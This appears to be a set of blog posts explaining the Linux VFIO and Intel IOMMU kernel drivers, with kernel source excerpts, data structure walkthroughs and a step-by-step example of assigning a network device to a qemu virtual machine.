kvm has a mechanism called irqfd. qemu can call ioctl(KVM_IRQFD) with ‘kvm_irqfd’ parameter to connect a irq and a fd.

    struct kvm_irqfd irqfd = {
            .fd = event_notifier_get_fd(&vdev->intx.interrupt),
            .gsi = vdev->intx.route.irq,
            .flags = KVM_IRQFD_FLAG_RESAMPLE,
    };

When the ‘fd’ has was signaled, the kvm subsystem will inject a ‘gsi’ interrupt to the VM. The irqfd bypass the userspace qemu and inject interrupt in kernel directly.

‘vfio_intx_enable_kvm’ is used to setup the interrupt fd’s irqfd. Notice here is a resample fd. In the vfio device interrupt handler in kernel, it will disable the interrupt. When the guest completes the interrupt dispatch, it will trigger an EOI and then the vfio can signal an event in the resample fd and reenable the interrupt again.

After doing some of the quirk work, ‘vfio_realize’ calls ‘vfio_register_err_notifier’ and ‘vfio_register_req_notifier’ to register two EventNotifier. Error EventNotifier is signaled when the physical has unrecoveralbe error detected. And req EventNotifier is signaled to unplug the vfio pci device.

VFIO driver analysis

2019-08-21T00:00:00+00:00

The VFIO driver is a framework for exposing direct device access to userspace. Virtual machine technology uses VFIO to assign physical device to VMs for highest possible IO performance. In this post, I will just focus the driver of VFIO.

VFIO’s basic idea is showing in the following figure. This is from Alex’s talk An Introduction to PCI Device Assignment with VFIO.

VFIO decomposes the physical device as a set of userspace API and recomposes the physical device’s resource to a virtual device in qemu.

There are three concepts in VFIO: Groups, Devices, and Containers.

Devices create a programming interface made up of IO access, interrupts, and DMA. The userspace(qemu) can utilize this interface to get the device’s information and config the devices.

Groups is a set of devices which is isolatable from all other devices in the system. Group is the minimum granularity that can be assigned to a VM.

Containers is a set of groups. Different groups can be set in the same container.

Following figure shows the relation of container, group and device.

Following figure shows the architecture of VFIO PCI.

Bind device to vifo-pci driver

In the ‘VFIO usage’ post, we know that before assigning the device to VM, we need to unbind its original driver and bind it to vfio-pci driver firstly.

vfio-pci driver just registers ‘vfio_pci_driver’ in ‘vfio_pci_init’ function. When binding the assigned device, the ‘probe’ callback will be called, it’s ‘vfio_pci_probe’.

‘vfio_pci_probe’ first allocates and initializes a ‘vfio_pci_device’ struct, then calls ‘vfio_add_group_dev’ to create and add a ‘vfio_device’ to ‘vfio_group’. If the ‘vfio_group’ is not created, ‘vfio_add_group_dev’ will also create one.

    int vfio_add_group_dev(struct device *dev,
                    const struct vfio_device_ops *ops, void *device_data)
    {
            struct iommu_group *iommu_group;
            struct vfio_group *group;
            struct vfio_device *device;

            iommu_group = iommu_group_get(dev);
            if (!iommu_group)
                    return -EINVAL;

            group = vfio_group_get_from_iommu(iommu_group);
            if (!group) {
                    group = vfio_create_group(iommu_group);
                    if (IS_ERR(group)) {
                            iommu_group_put(iommu_group);
                            return PTR_ERR(group);
                    }
            } else {
                    /*
                    * A found vfio_group already holds a reference to the
                    * iommu_group.  A created vfio_group keeps the reference.
                    */
                    iommu_group_put(iommu_group);
            }

            device = vfio_group_get_device(group, dev);
            if (device) {
                    WARN(1, "Device %s already exists on group %d\n",
                    dev_name(dev), iommu_group_id(iommu_group));
                    vfio_device_put(device);
                    vfio_group_put(group);
                    return -EBUSY;
            }

            device = vfio_group_create_device(group, dev, ops, device_data);
            if (IS_ERR(device)) {
                    vfio_group_put(group);
                    return PTR_ERR(device);
            }

            /*
            * Drop all but the vfio_device reference.  The vfio_device holds
            * a reference to the vfio_group, which holds a reference to the
            * iommu_group.
            */
            vfio_group_put(group);

            return 0;
    }

‘vfio_group’ is defined as following:

            struct vfio_group {
                    struct kref			kref;
                    int				minor;
                    atomic_t			container_users;
                    struct iommu_group		*iommu_group;
                    struct vfio_container		*container;
                    struct list_head		device_list;
                    struct mutex			device_lock;
                    struct device			*dev;
                    struct notifier_block		nb;
                    struct list_head		vfio_next;
                    struct list_head		container_next;
                    struct list_head		unbound_list;
                    struct mutex			unbound_lock;
                    atomic_t			opened;
            };

‘vfio_create_group’ creates and initializes a ‘vfio_group’. ‘vfio_create_group’ also create a device file in ‘/dev/vfio/’ directory, it represents the group file, this file’s file_ops is ‘vfio_group_fops’. ‘vfio_group’s dev is for this device. ‘container’ field points the container of which this group attached to. ‘device_list’ links the vfio device’. ‘iommu_group’ points the low level of iommu group, this is the ‘device’s iommu group created when the IOMMU setup. ‘vfio_group’ is like a bridge between the vfio interface and the low level iommu. Once ‘vfio_group’ is created, it will be linked in the global variable ‘vfio’s group_list.

In ‘vfio_add_group_dev’, after get or create a ‘vfio_group’, it will create and add a ‘vfio_device’ to the ‘vfio_group’. This is done by ‘vfio_group_create_device’. ‘vfio_device’ is defined as following:

            struct vfio_device {
                    struct kref			kref;
                    struct device			*dev;
                    const struct vfio_device_ops	*ops;
                    struct vfio_group		*group;
                    struct list_head		group_next;
                    void				*device_data;
            };

Here ‘dev’ is the physical device. ‘ops’ is ‘vfio_pci_ops’, ‘group’ is get or created right now, ‘group_next’ is used to link this ‘vfio_device’ to ‘vfio_group’s “device_list’ field. ‘device_data’ will be set to ‘vfio_pci_device’ created in ‘vfio_pci_probe’.

When the userspace trigger ioctl(VFIO_GROUP_GET_DEVICE_FD) in group’s fd, the corresponding handler ‘vfio_group_get_device_fd’ will alloc a ‘file’ pointer and a ‘fd’ using the ‘vfio_device’ as the private data. This fd’s file_ops is ‘vfio_device_fops’ which callbacks calls the ‘vfio_pci_ops’s corresponding function in mostly cases.

Following figure shows some of the data structure’s relation.

VFIO kernel module initialization

VFIO driver creates the ‘/dev/vfio/vfio’ device and manages the whole system’s VFIO. VFIO driver defines a ‘vfio’ global variable to store the vfio iommu driver and iommu group.

            static struct vfio {
                    struct class			*class;
                    struct list_head		iommu_drivers_list;
                    struct mutex			iommu_drivers_lock;
                    struct list_head		group_list;
                    struct idr			group_idr;
                    struct mutex			group_lock;
                    struct cdev			group_cdev;
                    dev_t				group_devt;
                    wait_queue_head_t		release_q;
            } vfio;

All vfio iommu drivers will be linked in ‘iommu_drivers_list’. All vfio group will be linke in ‘group_list’.

In ‘vfio_init’, it initialize this ‘vfio’ struct and register a misc device named ‘vfio_dev’. It creates a ‘vfio’ device class and allocates the device numbers for the group node in ‘/dev/vfio/$group_id’.

‘/dev/vfio/vfio’s file_ops is ‘vfio_fops’, the ‘open’ callback is ‘vfio_fops_open’. We can see a ‘vfio_container’ is set to the ‘/dev/vfio/vfio/’s fd ‘private_data’.

            static int vfio_fops_open(struct inode *inode, struct file *filep)
            {
                    struct vfio_container *container;

                    container = kzalloc(sizeof(*container), GFP_KERNEL);
                    if (!container)
                            return -ENOMEM;

                    INIT_LIST_HEAD(&container->group_list);
                    init_rwsem(&container->group_lock);
                    kref_init(&container->kref);

                    filep->private_data = container;

                    return 0;
            }

Attach the group to container and Allocate IOMMU

We now has a container fd(by opening the ‘/dev/vfio/vfio’ device) and group fd(by opening the ‘/dev/vfio/$gid’). We need to attach this group to container, this is done by calling ioctl(VFIO_GROUP_SET_CONTAINER) in group fd. The handle for this ioctl is ‘vfio_group_set_container’.

            static int vfio_group_set_container(struct vfio_group *group, int container_fd)
            {
                    struct fd f;
                    struct vfio_container *container;
                    struct vfio_iommu_driver *driver;
                    int ret = 0;

                    ...

                    f = fdget(container_fd);
                    ...
                    container = f.file->private_data;
                    WARN_ON(!container); /* fget ensures we don't race vfio_release */

                    down_write(&container->group_lock);

                    driver = container->iommu_driver;
                    if (driver) {
                            ret = driver->ops->attach_group(container->iommu_data,
                                                            group->iommu_group);
                            if (ret)
                                    goto unlock_out;
                    }

                    group->container = container;
                    list_add(&group->container_next, &container->group_list);

                    /* Get a reference on the container and mark a user within the group */
                    vfio_container_get(container);
                    atomic_inc(&group->container_users);

            unlock_out:
                    up_write(&container->group_lock);
                    fdput(f);
                    return ret;
            }

The most important work here is to add the group to the container’s ‘group_list’. Also if the container has been set to a iommu driver, ‘vfio_group_set_container’ will attach this group to the iommu driver.

The userspace can set the container’s iommu by calling ioctl(VFIO_SET_IOMMU) on container fd. The handler for this ioctl is ‘vfio_ioctl_set_iommu’.

            static long vfio_ioctl_set_iommu(struct vfio_container *container,
                                            unsigned long arg)
            {
                    struct vfio_iommu_driver *driver;
                    long ret = -ENODEV;

                    down_write(&container->group_lock);

                    /*
                    * The container is designed to be an unprivileged interface while
                    * the group can be assigned to specific users.  Therefore, only by
                    * adding a group to a container does the user get the privilege of
                    * enabling the iommu, which may allocate finite resources.  There
                    * is no unset_iommu, but by removing all the groups from a container,
                    * the container is deprivileged and returns to an unset state.
                    */
                    if (list_empty(&container->group_list) || container->iommu_driver) {
                            up_write(&container->group_lock);
                            return -EINVAL;
                    }

                    mutex_lock(&vfio.iommu_drivers_lock);
                    list_for_each_entry(driver, &vfio.iommu_drivers_list, vfio_next) {
                            void *data;

                            if (!try_module_get(driver->ops->owner))
                                    continue;

                            /*
                            * The arg magic for SET_IOMMU is the same as CHECK_EXTENSION,
                            * so test which iommu driver reported support for this
                            * extension and call open on them.  We also pass them the
                            * magic, allowing a single driver to support multiple
                            * interfaces if they'd like.
                            */
                            if (driver->ops->ioctl(NULL, VFIO_CHECK_EXTENSION, arg) <= 0) {
                                    module_put(driver->ops->owner);
                                    continue;
                            }

                            /* module reference holds the driver we're working on */
                            mutex_unlock(&vfio.iommu_drivers_lock);

                            data = driver->ops->open(arg);
                            if (IS_ERR(data)) {
                                    ret = PTR_ERR(data);
                                    module_put(driver->ops->owner);
                                    goto skip_drivers_unlock;
                            }

                            ret = __vfio_container_attach_groups(container, driver, data);
                            if (!ret) {
                                    container->iommu_driver = driver;
                                    container->iommu_data = data;
                            } else {
                                    driver->ops->release(data);
                                    module_put(driver->ops->owner);
                            }

                            goto skip_drivers_unlock;
                    }

                    mutex_unlock(&vfio.iommu_drivers_lock);
            skip_drivers_unlock:
                    up_write(&container->group_lock);

                    return ret;
            }

The vfio iommu driver supported by system is registered in ‘vfio.iommu_drivers_list’. vfio iommu driver is the layer between vfio and iommu hardware. We will take the version 2 of type1 vfio iommu as an example. ‘vfio_ioctl_set_iommu’ first calls the ‘open’ callback of vfio iommu driver, and get a driver-specific data. Then use this driver-specific data call ‘__vfio_container_attach_groups’, this function iterate the groups in this container and calls the ‘attach_group’ callback of vfio iommu driver.

‘vfio_iommu_driver_ops_type1’ is defined as following:

            static const struct vfio_iommu_driver_ops vfio_iommu_driver_ops_type1 = {
                    .name		= "vfio-iommu-type1",
                    .owner		= THIS_MODULE,
                    .open		= vfio_iommu_type1_open,
                    .release	= vfio_iommu_type1_release,
                    .ioctl		= vfio_iommu_type1_ioctl,
                    .attach_group	= vfio_iommu_type1_attach_group,
                    .detach_group	= vfio_iommu_type1_detach_group,
            };

‘vfio_iommu_type1_open’ allocates and initializes a ‘vfio_iommu’ strut and return it. ‘vfio_iommu’ is defined as following:

            struct vfio_iommu {
                    struct list_head	domain_list;
                    struct mutex		lock;
                    struct rb_root		dma_list;
                    bool			v2;
                    bool			nesting;
            };

‘domain_list’ links the ‘vfio_domain’ attached to the container. ‘dma_list’ is used to record the IOVA information.

‘vfio_iommu_type1_attach_group’ is used to attach a iommu_group to the vfio iommu. ‘vfio_iommu_type1_attach_group’ will allocate a new ‘vfio_group’ and ‘vfio_domain’. ‘vfio_domain’ has a ‘iommu_domain’ which is used to store the hardware iommu information. Then this function calls ‘iommu_attach_group’ to attach the iommu group to iommu domain. This finally calls ‘intel_iommu_attach_device’. After ‘domain_add_dev_info’->’dmar_insert_one_dev_info’->’domain_context_mapping’…->’domain_context_mapping_one’. The device’s info was written to the context table. Notice, in ‘vfio_iommu_type1_attach_group’, if two vfio_domain has the same iommu, then different group will be attached to the same ‘vfio_domain’.

Following figure shows some of the data structure’s relation.

IOVA map

The userspace can set the iova(GPA)->HPA mapping by calling ioctl(VFIO_IOMMU_MAP_DMA) on container fd. The ‘VFIO_IOMMU_MAP_DMA’s argument is ‘vfio_iommu_type1_dma_map’. It is defined as following:

            struct vfio_iommu_type1_dma_map {
                    __u32	argsz;
                    __u32	flags;
            #define VFIO_DMA_MAP_FLAG_READ (1 << 0)		/* readable from device */
            #define VFIO_DMA_MAP_FLAG_WRITE (1 << 1)	/* writable from device */
                    __u64	vaddr;				/* Process virtual address */
                    __u64	iova;				/* IO virtual address */
                    __u64	size;				/* Size of mapping (bytes) */
            };

The ‘vaddr’ is the virtual adress of qemu process, the iova is the iova of device’s view. This ioctl handler is ‘vfio_dma_do_map’. ‘vfio_dma_do_map’ will pin the physical pages of virtual address of qemu’s and then calls ‘vfio_iommu_map’ to do the iova to hpa’s mapping. It calls ‘iommu_map’ and finally calls the ‘iommu_ops’s map function, this is ‘intel_iommu_map’ to complete the mapping work.

VFIO usage

2019-08-16T00:00:00+00:00

VFIO is used to assign a physical IO device to the virtual machine. I will write some internal posts to explain how VFIO works. First of all, we need to know how to use VFIO. We will create a VMware workstation virtual machine(VM1), in the VMs, we will create a qemu virtual machine(VM2) and assign a device of VM1’s to VM2.

1

Create a new network device for VM1 in VMware workstation, open the .vmx file with editor and change this new network’s type from e1000 to vmxnet3.

    ethernet1.virtualDev = "vmxnet3"

2

Find the PCI address(BDF) in system(lspci -v)

    03:00.0 Ethernet controller: VMware VMXNET3 Ethernet Controller (rev 01)

3

Find the devices’ iommu group, this is generated when iommu initializing.

    test@ubuntu:~$ ls -lh /sys/bus/pci/devices/0000:03:00.0/iommu_group/devices
    total 0
    lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.0 -> ../../../../devices/pci0000:00/0000:00:15.0
    lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.1 -> ../../../../devices/pci0000:00/0000:00:15.1
    lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.2 -> ../../../../devices/pci0000:00/0000:00:15.2
    lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.3 -> ../../../../devices/pci0000:00/0000:00:15.3
    lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.4 -> ../../../../devices/pci0000:00/0000:00:15.4
    lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.5 -> ../../../../devices/pci0000:00/0000:00:15.5
    lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.6 -> ../../../../devices/pci0000:00/0000:00:15.6
    lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.7 -> ../../../../devices/pci0000:00/0000:00:15.7
    lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:03:00.0 -> ../../../../devices/pci0000:00/0000:00:15.0/0000:03:00.0

In general, the devices of the same iommu group should assign the same domain. However, in this example, only our vmxnet network card is a PCI device, others are all PCI bridges, vfio-pci does not currently support PCI bridges.

4

Unbind the device with the driver

    echo 0000:01:10.0 >/sys/bus/pci/devices/0000:03:00.0/driver/unbind

5

Find the vendor and device ID

    test@ubuntu:~$ lspci -n -s 0000:03:00.0
    03:00.0 0200: 15ad:07b0 (rev 01)

6

Bind the device to vfio-pci driver(should modprobe vfio-pci firstly)

    echo 15ad 07b0 > /sys/bus/pci/drivers/vfio-pci/new_id

Now we can see a new node created in ‘/dev/vfio/’, this is the group id.

    test@ubuntu:~$ ls -l /dev/vfio/
    total 0
    crw------- 1 root root 243,   0 Aug 14 08:23 6
    crw-rw-rw- 1 root root  10, 196 Aug 14 08:23 vfio

7

start qemu with the assigned device.

    x86_64-softmmu/qemu-system-x86_64 -m 1024 -smp 4 -hda /home/test/test.img --enable-kvm -vnc :0 --enable-kvm -device vfio-pci,host=03:00.0,id=net0

Now we can see the device in guest and it’s driver is vmxnet3.

intel IOMMU driver analysis

2019-08-10T00:00:00+00:00

In the last post IOMMU introduction we have got the basic idea of what is IOMMU and what it is for. In this post, we will dig into the intel-iommu driver source. The kernel version as before is 4.4.

In order to experiment the IOMMU we start a VM with vIOMMU, following is the command line:

    gdb --args x86_64-softmmu/qemu-system-x86_64  -machine q35,accel=kvm,kernel-irqchip=split -m 1G -device intel-iommu -hda ~/test.img

In order to enable the intel-iommu we need to add ‘intel_iommu=on” argument to the kernel command line.

This post will contains following five part:

intel-iommu initialization
DMAR table parsing
DMAR initialization
Add device to iommu group
DMA operation without and with IOMMU

intel-iommu initialization

The bios is responsible for detecting the remapping hardware functions and it reports the remapping hardware units through the DMA Remapping Reporting(DMAR) ACPI table. DMAR ACPI table’s format is defined in VT-d spec 8.1. Just in a summary, DMAR ACPI table contains one DMAR remapping reporting structure and several remapping structures. qemu creates this DMAR ACPI table data in function ‘build_dmar_q35’.

‘DMAR remapping reporting structure’ contains a standard ACPI table header with some specific data for ‘DMAR’. There are several kinds of ‘Remapping Structure Types’. The type ‘0’ is DMA Remapping Hardware Unit(DRHD) structure, this is the most important structure. A DRHD structure represents a remapping hardware unit present in the platform. Following figure shows the format of DRHD.

Here the ‘Segment Number ‘ is the PCI Segment associated with this unit, PCI Segment is for the sever which needs a lot of PCI bus, it has one more PCI root bridge, every tree of this PCI root bridge is a PCI Domain/Segment. The ‘Flags’ currently only only has one valid bit. If ‘INCLUDE_PCI_ALL’ is set, it means the intel-iommu represented by this DRHD will control the PCI compatible devices, except devices reported under the scope of other DHRD. The ‘Device Scope[]’ contains zero or more Device Scope Entries, each Device Scope Entry can be used to indicate a PCI endport device that will be controlled in this DRHD. If the iommu support interrupt remapping capability, each IOxAPIC in the platform reported by MADT ACPI table must be explicity enumerated under the Device Scope of the appropriate remapping hardware uinits. In ‘build_dmar_q35’ function, qemu only creates one DRHD with a ‘IOAPIC’ device scope entry. If the ‘device-iotlb’ is suppported, there also a ‘Root Port ATS Capability Reporting (ATSR) Structure’.

For “intel_iommu=” parameter, kernel handles it using ‘intel_iommu_setup’ function. For “intel_iommu=on”, the ‘dmar_disabled’ will be set to 0. In kernel function ‘detect_intel_iommu’, it will detect the intel-iommu device. It calls ‘dmar_table_detect’ to map the DMAR ACPI table to kernel and use ‘dmar_tbl’ point it, then it walks the table with ‘dmar_res_callback’. There only a ‘dmar_validate_one_drhd’ for DRHD table. ‘dmar_validate_one_drhd’ will return 0 if the DRHD is valid. So finally the ‘iommu_detected’ will be set to 1 and ‘x86_init.iommu.iommu_init’ will be set to ‘intel_iommu_init’.

Later in ‘pci_iommu_init’, the ‘iommu_init’ callback will be called. ‘intel_iommu_init’ will be used to initialized the intel-iommu device.

int __init intel_iommu_init(void)
{
    int ret = -ENODEV;
    struct dmar_drhd_unit *drhd;
    struct intel_iommu *iommu;

    /* VT-d is required for a TXT/tboot launch, so enforce that */
    force_on = tboot_force_iommu();

    if (iommu_init_mempool()) {
        if (force_on)
            panic("tboot: Failed to initialize iommu memory\n");
        return -ENOMEM;
    }

    down_write(&dmar_global_lock);
    if (dmar_table_init()) {
        if (force_on)
            panic("tboot: Failed to initialize DMAR table\n");
        goto out_free_dmar;
    }

    if (dmar_dev_scope_init() < 0) {
        if (force_on)
            panic("tboot: Failed to initialize DMAR device scope\n");
        goto out_free_dmar;
    }


    ...

    if (dmar_init_reserved_ranges()) {
        if (force_on)
            panic("tboot: Failed to reserve iommu ranges\n");
        goto out_free_reserved_range;
    }

    init_no_remapping_devices();

    ret = init_dmars();
    ...
    up_write(&dmar_global_lock);
    pr_info("Intel(R) Virtualization Technology for Directed I/O\n");

    init_timer(&unmap_timer);
#ifdef CONFIG_SWIOTLB
    swiotlb = 0;
#endif
    dma_ops = &intel_dma_ops;

    init_iommu_pm_ops();

    for_each_active_iommu(iommu, drhd)
        iommu->iommu_dev = iommu_device_create(NULL, iommu,
                            intel_iommu_groups,
                            "%s", iommu->name);

    bus_set_iommu(&pci_bus_type, &intel_iommu_ops);
    bus_register_notifier(&pci_bus_type, &device_nb);
    if (si_domain && !hw_pass_through)
        register_memory_notifier(&intel_iommu_memory_nb);

    intel_iommu_enabled = 1;

    return 0;
    ...
}

‘iommu_init_mempool’ is used to create some caches. ‘dmar_table_init’ is used to parse the dmar table. ‘dmar_dev_scope_init’ does some initialization for the ‘Device Scope’ in DRHD. ‘dmar_init_reserved_ranges’ reserves all PCI MMIO adress to avoid peer-to-peer access. As the name indicating, ‘init_no_remapping_devices’ initializes the no mapping devices. ‘init_dmars’ is an important function, later I will use one section to analysis this. For every iommu device, iommu_device_create creates a sysfs device. ‘bus_set_iommu’ is used to add current PCI device to the appropriated iommu group and also register notifier to get the device add notification.

DMAR table parsing

‘intel_iommu_init’ calls ‘dmar_table_init’ which calls ‘parse_dmar_table’ to do the DMAR table parsing. ‘parse_dmar_table’ prepares a ‘dmar_res_callback’ struct which contains handlers of the every kind of the ‘Remapping structure’. Then ‘dmar_table_detect’ is called again to map the DMAR ACPI table to ‘dmar_tbl’. Later ‘dmar_walk_dmar_table’ is called with the ‘dma_rs_callback’ to walk the dmar_tbl and calls the correspoding remapping structure. For our qemu case, only a DHRD is used, the handler is ‘dmar_parse_one_drhd’.

The ‘dma_parse_one_drhd’ parses the DMAR table and creates a ‘dmar_drhd_unit’ struct, this struct is defined as follows:

struct dmar_drhd_unit {
    struct list_head list;		/* list of drhd units	*/
    struct  acpi_dmar_header *hdr;	/* ACPI header		*/
    u64	reg_base_addr;		/* register base address*/
    struct	dmar_dev_scope *devices;/* target device array	*/
    int	devices_cnt;		/* target device count	*/
    u16	segment;		/* PCI domain		*/
    u8	ignored:1; 		/* ignore drhd		*/
    u8	include_all:1;
    struct intel_iommu *iommu;
};

Most of the field is explained by the comment, the ‘iommu’ is allocated and initialized by ‘alloc_iommu’ function. ‘alloc_iommu’ will map the MMIO of iommu device and do some initialization work according to the BAR. In the last of ‘dma_parse_one_hrhd’ it calls ‘dmar_register_drhd_unit’ to add our new ‘dmar_drhd_unit’ to ‘dmar_drhd_units’ list. Following figure show the relation between ‘dmar_drhd_unit’ and ‘intel_iommu’.

‘dmar_dev_scope_init’ is used to initialize the Decie Scope Entries in DRHD, but as our one DRHR sets the ‘INCLUDE_PCI_ALL’ flag, it actually dones nothing.

‘dmar_init_reserved_ranges’ is used to reverse the ‘IOAPIC’ and all PCI MMIO address, so that the PCI device’s DMA will not use these IOVA.

‘init_no_remapping_devices’ also does nothing as our DRHD sets the ‘INCLUDE_PCI_ALL’ flag.

DMAR initialization

So we come to the ‘init_dmars’ function.

static int __init init_dmars(void)
{
    struct dmar_drhd_unit *drhd;
    struct dmar_rmrr_unit *rmrr;
    bool copied_tables = false;
    struct device *dev;
    struct intel_iommu *iommu;
    int i, ret;

    /*
    * for each drhd
    *    allocate root
    *    initialize and program root entry to not present
    * endfor
    */
    for_each_drhd_unit(drhd) {
        /*
        * lock not needed as this is only incremented in the single
        * threaded kernel __init code path all other access are read
        * only
        */
        if (g_num_of_iommus < DMAR_UNITS_SUPPORTED) {
            g_num_of_iommus++;
            continue;
        }
        pr_err_once("Exceeded %d IOMMUs\n", DMAR_UNITS_SUPPORTED);
    }

    /* Preallocate enough resources for IOMMU hot-addition */
    if (g_num_of_iommus < DMAR_UNITS_SUPPORTED)
        g_num_of_iommus = DMAR_UNITS_SUPPORTED;

    g_iommus = kcalloc(g_num_of_iommus, sizeof(struct intel_iommu *),
            GFP_KERNEL);
    if (!g_iommus) {
        pr_err("Allocating global iommu array failed\n");
        ret = -ENOMEM;
        goto error;
    }

    deferred_flush = kzalloc(g_num_of_iommus *
        sizeof(struct deferred_flush_tables), GFP_KERNEL);
    if (!deferred_flush) {
        ret = -ENOMEM;
        goto free_g_iommus;
    }

    for_each_active_iommu(iommu, drhd) {
        g_iommus[iommu->seq_id] = iommu;

        intel_iommu_init_qi(iommu);

        ret = iommu_init_domains(iommu);
        if (ret)
            goto free_iommu;

        init_translation_status(iommu);

        if (translation_pre_enabled(iommu) && !is_kdump_kernel()) {
            iommu_disable_translation(iommu);
            clear_translation_pre_enabled(iommu);
            pr_warn("Translation was enabled for %s but we are not in kdump mode\n",
                iommu->name);
        }

        /*
        * TBD:
        * we could share the same root & context tables
        * among all IOMMU's. Need to Split it later.
        */
        ret = iommu_alloc_root_entry(iommu);
        if (ret)
            goto free_iommu;
        ...
    }

    /*
    * Now that qi is enabled on all iommus, set the root entry and flush
    * caches. This is required on some Intel X58 chipsets, otherwise the
    * flush_context function will loop forever and the boot hangs.
    */
    for_each_active_iommu(iommu, drhd) {
        iommu_flush_write_buffer(iommu);
        iommu_set_root_entry(iommu);
        iommu->flush.flush_context(iommu, 0, 0, 0, DMA_CCMD_GLOBAL_INVL);
        iommu->flush.flush_iotlb(iommu, 0, 0, 0, DMA_TLB_GLOBAL_FLUSH);
    }

    ...
    /*
    * If we copied translations from a previous kernel in the kdump
    * case, we can not assign the devices to domains now, as that
    * would eliminate the old mappings. So skip this part and defer
    * the assignment to device driver initialization time.
    */
    if (copied_tables)
        goto domains_done;

    ...

 
domains_done:

    /*
    * for each drhd
    *   enable fault log
    *   global invalidate context cache
    *   global invalidate iotlb
    *   enable translation
    */
    for_each_iommu(iommu, drhd) {
        if (drhd->ignored) {
            /*
            * we always have to disable PMRs or DMA may fail on
            * this device
            */
            if (force_on)
                iommu_disable_protect_mem_regions(iommu);
            continue;
        }

        iommu_flush_write_buffer(iommu);

#ifdef CONFIG_INTEL_IOMMU_SVM
        if (pasid_enabled(iommu) && ecap_prs(iommu->ecap)) {
            ret = intel_svm_enable_prq(iommu);
            if (ret)
                goto free_iommu;
        }
#endif
        ret = dmar_set_interrupt(iommu);
        if (ret)
            goto free_iommu;

        if (!translation_pre_enabled(iommu))
            iommu_enable_translation(iommu);

        iommu_disable_protect_mem_regions(iommu);
    }

    return 0;
    ...
}

First iterate the ‘dmar_drhd_units’ and get the number of iommu device, store it in ‘g_num_of_iommus’. Allocate the space of all iommu pointer, store it in ‘g_iommus’. Then the ‘for_each_active_iommu’ loop initializes the iommu device.

In the loop, ‘intel_iommu_init_qi’ is used to initialize the queued invalidation interface, this interface is described in VT-d spec 6.5.2. ‘intel_iommu_init_qi’ allocates the queued invalidation interface’s ring buffer, store it in ‘iommu->qi’ and write the ‘iommu->qi’ physical address to iommu device’s register ‘DMAR_IQA_REG’.

Return to the loop, after the queued invalidation initialization finished, ‘iommu_init_domains’ is called to initialize the domain-related data structure. Referenced from VT-d spec: A domain is abstractly defined as an isolated environment in the platform, to which a subset of the host physical memory is allocated. I/O devices that are allowed to access physical memory directly are allocated to a domain and are referred to as the domain’s assigned devices. For virtualization usages, software may treat each virtual machine as a domain. ‘iommu_init_domains’ allocates a bitmap used for the domain id, stores it in ‘iomu->domain_ids’. A domain is represented by ‘dmar_domain’ struct. An iommu can support a lot of domain, but it may uses just a very small domain. So we can’t allocated all the ‘dmar_domain’. Instead, we uses a level allocation. ‘iommu->domains’ points an array of ‘dmar_domain**) and ‘iommu->domains[i]’ points the second level. And first we only allocates 256 ‘dmar_domin’ pointer.

In the loop, we allocates the root table by calling ‘iommu_alloc_root_entry’.

The ‘init_dmars’ then does the second ‘for_each_active_iommu’, this time it just sets root table entry’s base address by calling ‘for_each_active_iommu’.

‘init_dmars’ calls ‘iommu_prepare_isa’ to do a identity_map for the ISA bridge. Then we go to the finally loop. In the final for_each_iommu loop. It first invalidate the context cache and iotlb by calling ‘iommu_flush_write_buffer’, then request a irq to log the dma remapping fault, finally calls ‘iommu_enable_translation’ to enable the translation.

After the ‘init_dmars’, the data structure shows bellow.

Add device to iommu group

IOMMU group is the smallest sets of devices that can be considered isolated from the perspective of IOMMU. Some devices can do peer-to-peer DMA without the involvement of IOMMU, for these device, if they has different IOVA page table and do the peer-to-per DMA, it will cause errors. Alex Williamson has written a great post explaining the IOMMU group IOMMU Groups, inside and out. In ‘intel_iommu_init’, it calls ‘bus_set_iommu’ to set current PCI device to device iommu group.

‘bus_set_iommu’ is used to set iommu-callback for the bus. Following sets the pci bus’s iommu callback to intel_iommu_ops.

bus_set_iommu(&pci_bus_type, &intel_iommu_ops);

‘bus_set_iommu’ sets ‘bus->iommu_ops’ to the ‘ops’ parameter, then calls ‘iommu_bus_init’.

static int iommu_bus_init(struct bus_type *bus, const struct iommu_ops *ops)
{
    int err;
    struct notifier_block *nb;
    struct iommu_callback_data cb = {
        .ops = ops,
    };

    nb = kzalloc(sizeof(struct notifier_block), GFP_KERNEL);
    if (!nb)
        return -ENOMEM;

    nb->notifier_call = iommu_bus_notifier;

    err = bus_register_notifier(bus, nb);
    if (err)
        goto out_free;

    err = bus_for_each_dev(bus, NULL, &cb, add_iommu_group);
    if (err)
        goto out_err;


    return 0;

out_err:
    /* Clean up */
    bus_for_each_dev(bus, NULL, &cb, remove_iommu_group);
    bus_unregister_notifier(bus, nb);

out_free:
    kfree(nb);

    return err;
}

‘iommu_bus_init’ registers a notifier for the bus event, this is useful for new hot-plug devices. The most work is to call ‘add_iommu_group’ for every PCI device. ‘add_iommu_group’ just calls the ‘iommu_ops’s add_device callback, it’s ‘intel_iommu_add_device’.

static int intel_iommu_add_device(struct device *dev)
{
    struct intel_iommu *iommu;
    struct iommu_group *group;
    u8 bus, devfn;

    iommu = device_to_iommu(dev, &bus, &devfn);
    if (!iommu)
        return -ENODEV;

    iommu_device_link(iommu->iommu_dev, dev);

    group = iommu_group_get_for_dev(dev);

    if (IS_ERR(group))
        return PTR_ERR(group);

    iommu_group_put(group);
    return 0;
}

First, get the ‘intel_iommu’ associated with the device ‘dev’ and also get the ‘bus’ and ‘devfn’ of the device. It’s quite easy, just get the device’s domain(segment) id and use this segment id to find the ‘intel_iommu’ in ‘dmar_drhd_units’ list.

‘iommu_device_link’ function is also trivial. Create a link file ‘iommu’ in PCI device directory to point the iommu device directory and also a ‘link’ in iommu ‘devices’ directory to point the PCI device.

The most important is ‘iommu_group_get_for_dev’, thsi function finds or creates the IOMMU group for a device.

struct iommu_group *iommu_group_get_for_dev(struct device *dev)
{
    const struct iommu_ops *ops = dev->bus->iommu_ops;
    struct iommu_group *group;
    int ret;

    group = iommu_group_get(dev);
    ...
    if (ops && ops->device_group)
        group = ops->device_group(dev);

    ...
    ret = iommu_group_add_device(group, dev);
    ...
